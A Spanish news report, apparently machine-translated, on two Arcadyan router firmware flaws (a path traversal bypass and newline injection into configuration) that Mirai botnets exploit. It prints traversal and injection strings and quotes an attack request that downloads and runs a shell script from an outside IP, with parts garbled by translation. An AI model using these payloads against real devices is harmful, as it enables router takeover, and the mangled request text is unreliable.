Se ha registrado un ataque masivo en la red contra routers domésticos cuyo firmware utiliza una implementación de servidor HTTP de la empresa Arcadyan. Para obtener control sobre los dispositivos, se utiliza una combinación de dos vulnerabilidades que permite la ejecución remota de código arbitrario con derechos de root. El problema afecta a una gama bastante amplia de enrutadores ADSL de Arcadyan, ASUS y Buffalo, así como a dispositivos suministrados con las marcas Beeline (el problema se confirma en Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone y otros operadores de telecomunicaciones. Cabe señalar que el problema ha estado presente en el firmware de Arcadyan durante más de 10 años y durante este tiempo ha logrado migrar a al menos 20 modelos de dispositivos de 17 fabricantes diferentes.
La primera vulnerabilidad, CVE-2021-20090, permite acceder a cualquier script de interfaz web sin autenticación. La esencia de la vulnerabilidad es que en la interfaz web, algunos directorios a través de los cuales se envían imágenes, archivos CSS y scripts JavaScript son accesibles sin autenticación. En este caso, los directorios a los que se permite el acceso sin autenticación se comprueban mediante la máscara inicial. El firmware bloquea la especificación de caracteres “../” en las rutas para ir al directorio principal, pero se omite el uso de la combinación “..%2f”. Por lo tanto, es posible abrir páginas protegidas al enviar solicitudes como “http://192.168.1.1/images/..%2findex.htm”.
La segunda vulnerabilidad, CVE-2021-20091, permite a un usuario autenticado realizar cambios en la configuración del sistema del dispositivo enviando parámetros con formato especial al script apply_abstract.cgi, que no verifica la presencia de un carácter de nueva línea en los parámetros. . Por ejemplo, al realizar una operación ping, un atacante puede especificar el valor "192.168.1.2%0AARC_SYS_TelnetdEnable=1" en el campo con la dirección IP que se está verificando y el script, al crear el archivo de configuración /tmp/etc/config/ .glbcfg, escribirá la línea “AARC_SYS_TelnetdEnable=1” en él ", lo que activa el servidor telnetd, que proporciona acceso al shell de comandos sin restricciones con derechos de root. De manera similar, al configurar el parámetro AARC_SYS, puede ejecutar cualquier código en el sistema. La primera vulnerabilidad permite ejecutar un script problemático sin autenticación accediendo a él como “/images/..%2fapply_abstract.cgi”.
Para explotar las vulnerabilidades, un atacante debe poder enviar una solicitud al puerto de red en el que se ejecuta la interfaz web. A juzgar por la dinámica de propagación del ataque, muchos operadores dejan el acceso a sus dispositivos desde la red externa para simplificar el diagnóstico de problemas por parte del servicio de soporte. Si el acceso a la interfaz se limita únicamente a la red interna, se puede realizar un ataque desde una red externa utilizando la técnica de “rebinding DNS”. Las vulnerabilidades ya se están utilizando activamente para conectar enrutadores a la botnet Mirai: POST /images/..%2fapply_abstract.cgi Conexión HTTP/1.1: cerrar User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; rizo+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Fuente: opennet.ru